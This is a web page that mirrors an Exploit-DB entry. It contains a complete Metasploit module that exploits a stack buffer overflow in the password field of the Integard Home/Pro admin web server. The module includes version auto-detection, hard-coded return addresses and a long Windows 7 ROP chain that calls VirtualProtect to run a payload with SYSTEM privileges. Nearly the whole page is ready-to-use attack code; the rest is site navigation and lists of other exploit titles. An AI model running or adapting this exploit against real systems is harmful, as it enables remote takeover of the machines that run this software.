首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Integard Pro 2.2.0.9026 (Win7 ROP-Code Metasploit Module)
来源:http://www.exploit-db.com 作者:Node 发布时间:2010-09-16  

# Exploit Title: Integard Pro 2.2.0.9026 (Win7 ROP-Code Metasploit Module)
# Date: 2010-09-15
# Author: Node
# Software Link: http://www.exploit-db.com/application/14941
# Version: Race River Integard Pro 2.2.0.9026, integard32.dll(v.2.0.0.306)
# Tested on: Windows 7 x64 Eng
# CVE : -

class Metasploit3 < Msf::Exploit::Remote
 Rank = GreatRanking # stack bof, seh, universal ret, auto targeting

 include Msf::Exploit::Remote::HttpClient

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow',
   'Description'    => %q{
      This module exploits a stack buffer overflow in Race river's Integard Home/Pro
     internet content filter HTTP Server. Versions prior to 2.0.0.9037 and 2.2.0.9037 are
     vulnerable.

     The administration web page on port 18881 is vulnerable to a remote buffer overflow
     attack. By sending an long character string in the password field, both the structured
     exception handler and the saved extended instruction pointer are over written, allowing
     an attacker to gain control of the application and the underlying operating system
     remotely.

     The administration website service runs with SYSTEM privileges, and automatically
     restarts when it crashes.
   },
   'Author'  =>
    [
     'Lincoln', # original discovery
     'Nullthreat',
     'rick2600',
     'corelanc0d3r',
     'jduck', # fleshed out module from advisory
     'Node' # Win7 rop-code
    ],
   'License'       => MSF_LICENSE,
   'Version'       => '$Revision: 99999 $',
   'References'    =>
    [
     ['OSVDB', '67909'],
     ['URL','http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061'],
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'thread',
    },
   'Payload'        =>
    {
     'Space'    => 1000,
     'BadChars'  => "\x00\x20\x26\x2f\x3d\x3f\x5c",
     'StackAdjustment' => -1500,
    },
   'Platform'       => 'win',
   'Privileged'     => false,
   'Targets'        =>
    [
     [ 'Automatic Targeting',          { 'auto' => true }],
     [ 'Integard Home 2.0.0.9021', { 'Ret' => 0x0041565E,}], # p/p/r
     [ 'Integard Pro  2.2.0.9026', { 'Ret' => 0x0040362C,}], # p/p/r
     [ 'Integard Pro  2.2.0.9026, integard32.dll(v.2.0.0.306) (Windows 7 x64 Eng)', { 'Win7' => true,}]
    ],
   'DefaultTarget'  => 0,
   'DisclosureDate' => 'Sep 07 2010'))

  register_options(
   [
    Opt::RPORT(18881)
   ], self.class )
 end

 def exploit

  rop = [0x10010793].pack('V') # RET
  rop << rand_text_alpha_upper(20)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << [0xFFB8A378].pack('V') # PUSH ESP # SUB EAX,20 # POP EBX # RETN
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x100111B7].pack('V')  # ADD ESP,2C # POP ESI # POP EBP # RETN
  rop << "1111" #VirtualProtect placeholder
  rop << "2222" #return address placeholder
  rop << "3333" #lpAddress placeholder
  rop << "4444" #dwsize placeholder
  rop << "5555" #flNewProtect placeholder
  rop << [0x10019005].pack('V') # writable
  rop << rand_text_alpha_upper(28)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << [0xFFBBA5CE].pack('V') # INC EBX # RETN
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x10010EB5].pack('V')  # POP EDI # POP ESI # RETN
  rop << [0x10019005].pack('V') # writable
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << [0xFFB95B6F].pack('V')  # PUSH EBX # SBB BYTE PTR DS:[EDI+5E],BL # POP EBP # MOV EAX,-2 # POP EBX # RETN
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << [0xFFFFF41C].pack('V') #length to kernel32
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10010C6B].pack('V')  # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100107E8].pack('V') # POP EAX # POP ESI # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xEFFF2E41].pack('V') # ADD EBX,EBP # RETN
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << [0xEFFF2E41].pack('V') # ADD EBX,EBP # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x10010C69].pack('V')  # MOV EDX,EBX # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xEFFFA79E].pack('V') # XCHG EAX,EBP # POP ESI # POP EBP # POP EDI # POP EBX # POP ECX # RETN
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10010C6B].pack('V')  # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xFFB81B31].pack('V') # MOV EAX,EDX # RETN
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x100137AB].pack('V')  # MOV EAX,DWORD PTR DS:[EAX] # POP ESI # POP EBP # RETN
  rop << rand_text_alpha_upper(8)
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10010C69].pack('V')  # MOV EDX,EBX # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xFFFFFE75].pack('V') # length to VP
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10013B9D].pack('V')  # MOV EAX,EBX # POP EBX # POP EBP # RETN
  rop << rand_text_alpha_upper(8)
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10010C6B].pack('V')  # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xFFB81B31].pack('V')  # MOV EAX,EDX # RETN
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10013B9D].pack('V')  # MOV EAX,EBX # POP EBX # POP EBP # RETN
  rop << rand_text_alpha_upper(8)
  rop << [0x1001072D].pack('V')  # MOV DWORD PTR DS:[ECX],EAX # POP EBP # RET
  rop << rand_text_alpha_upper(4)
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x1001072D].pack('V')  # MOV DWORD PTR DS:[ECX],EAX # POP EBP # RET
  rop << rand_text_alpha_upper(4)
  rop << [0x10010C6B].pack('V')  # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xFFFFF868].pack('V')  # length to shellcode
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10010C69].pack('V')  # MOV EDX,EBX # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xFFB81B31].pack('V')  # MOV EAX,EDX # RETN
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x10010C69].pack('V')  # MOV EDX,EBX # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0x10010798].pack('V')  # ADD DWORD PTR DS:[EAX],EDX # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x100137AB].pack('V')  # MOV EAX,DWORD PTR DS:[EAX] # POP ESI # POP EBP # RETN
  rop << rand_text_alpha_upper(8)
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x1001072D].pack('V')  # MOV DWORD PTR DS:[ECX],EAX # POP EBP # RET
  rop << rand_text_alpha_upper(4)
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10010C6B].pack('V')  # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xFFFFFC18].pack('V')  # size (1000)
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10013B9D].pack('V') # MOV EAX,EBX # POP EBX # POP EBP # RETN
  rop << rand_text_alpha_upper(8)
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x1001072D].pack('V')  # MOV DWORD PTR DS:[ECX],EAX # POP EBP # RET
  rop << rand_text_alpha_upper(4)
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x100114C8].pack('V')  # ADD EAX,1 # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10010C6B].pack('V')  # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xFFFFFFC0].pack('V')  # newprotect(0x40)
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10013B9D].pack('V') # MOV EAX,EBX # POP EBX # POP EBP # RETN
  rop << rand_text_alpha_upper(8)
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x1001072D].pack('V')  # MOV DWORD PTR DS:[ECX],EAX # POP EBP # RET
  rop << rand_text_alpha_upper(4)
  rop << [0x10010C6B].pack('V')  # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xFFFFFFF0].pack('V') # length to saved VP on the stack
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10013B9D].pack('V') # MOV EAX,EBX # POP EBX # POP EBP # RETN
  rop << rand_text_alpha_upper(8)
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10010C6B].pack('V')  # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xEFFF2818].pack('V')  # XCHG EAX,ESP # RETN
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10012EC7].pack('V')  # XCHG EAX,ECX # RETN
  rop << [0x10010C69].pack('V')  # MOV EDX,EBX # MOV EBX,ECX # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
  rop << rand_text_alpha_upper(4)
  rop << [0x100106E6].pack('V')  # POP ECX # RETN
  rop << rand_text_alpha_upper(16)
  rop << [0xFFB81B31].pack('V')  # MOV EAX,EDX # RETN
  rop << [0x100109B0].pack('V')  # MOV EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x10010A2A].pack('V')  # SUB EAX,ECX # RETN
  rop << [0x1001274C].pack('V')  # CALL EAX # RETN
  rop << [0x10010F0B].pack('V')  # CALL EBX # ...

  mytarget = nil
  if (target['auto'])
   print_status("Automatically detecting the target...")
   response = send_request_raw(
    {
     'uri' => '/banner.jpg',
     'version' => '1.1',
     'method' => 'GET'
    }, 5)

   case response['Content-Length'].to_i
   when 24584
    print_status("[!] Found Version - Integard Home")
    mytarget = targets[1]
   when 23196
    mytarget = targets[2]
    print_status("[!] Found Version - Integard Pro")
   end

  else
   mytarget = target
  end

  if not mytarget
   raise RuntimeError, "Unable to automatically detect the target version"
  end

  print_status("Selected Target: #{mytarget.name}")

  print_status("Building Buffer")
  pay = payload.encoded
  if (target['Win7'])
   buffer = rand_text_alpha_upper(832)
   buffer << rop
   buffer << rand_text_alpha_upper(2000 - rop.length)
   buffer << pay
   buffer << rand_text_alpha_upper(1000 - pay.length)
  else

   buffer = ''
   buffer << rand_text_alpha_upper(3091 - pay.length)
   buffer << pay
   buffer << "\xE9\x2B\xF8\xFF\xFF"
   buffer << "\xEB\xF9\x90\x90"
   buffer << [mytarget.ret].pack('V')
  end
   print_status("Sending Request")
   send_request_raw({
     'uri' => '/LoginAdmin',
     'version' => '1.1',
     'method' => 'POST',
     'headers' =>
      {
       'Host' => '192.168.1.1:18881',
       'Content-Length' => 1074
      },
     'data' => "Password=" + buffer + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login"
    }, 5)

   print_status("Request Sent")

   handler
 end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MP3 Workstation Version 9.2.1.
·win32/xp sp3 (Tr) cmd.exe Shel
·Ipswitch Imail Server List Mai
·win32/xp sp3 (Tr) Create New F
·win32/xp sp3 (Tr) MessageBoxA
·win32/xp sp3 (Tr) calc.exe She
·plano mostracategoria (id) Rem
·vBulletin vbseo.php本地文件包
·NCP Secure Entry Client v.9.23
·xp_hello.dll(sa) 提权工具
·NCP Secure Client - Juniper Ed
·IBM Lotus Domino iCalendar Ema
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved